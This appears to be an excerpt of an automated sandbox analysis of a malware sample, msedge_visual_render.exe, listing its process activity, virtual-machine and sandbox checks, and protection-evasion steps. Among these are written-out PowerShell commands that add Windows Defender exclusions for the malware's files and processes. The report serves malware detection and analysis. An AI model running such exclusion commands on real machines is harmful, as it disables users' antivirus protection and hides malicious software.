              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\msedge_visual_render.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Memory allocated: 960000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Memory allocated: 1A6F0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\msedge.exe | Memory allocated: C80000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\msedge.exe | Memory allocated: 1A8D0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\msedge.exe | Memory allocated: 1360000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\msedge.exe | Memory allocated: 1B080000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\msedge.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Window / User API: threadDelayed 771
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Window / User API: threadDelayed 9071
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6177
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3621
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7963
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1616
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7740
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1941
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6372
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3285
              Source: C:\Users\user\Desktop\msedge_visual_render.exe TID: 6348 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7084 | Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4768 | Thread sleep count: 7963 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604 | Thread sleep count: 1616 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1628 | Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5308 | Thread sleep count: 7740 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 | Thread sleep count: 1941 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520 | Thread sleep time: -5534023222112862s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820 | Thread sleep count: 6372 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2780 | Thread sleep count: 3285 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Users\user\AppData\Roaming\msedge.exe TID: 6504 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\msedge.exe TID: 2452 | Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Roaming\msedge.exe | File Volume queried: C:\ FullSizeInformation
              Source: msedge_visual_render.exe, 00000000.00000002.3299446821.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22'
              Source: msedge_visual_render.exe, 00000000.00000002.3340935332.000000001B580000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dllity.SqlRoleProvider, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" />
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Process token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\msedge.exe'
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge_visual_render.exe'
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Queries volume information: C:\Users\user\Desktop\msedge_visual_render.exe VolumeInformation
              Source: C:\Users\user\Desktop\msedge_visual_render.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
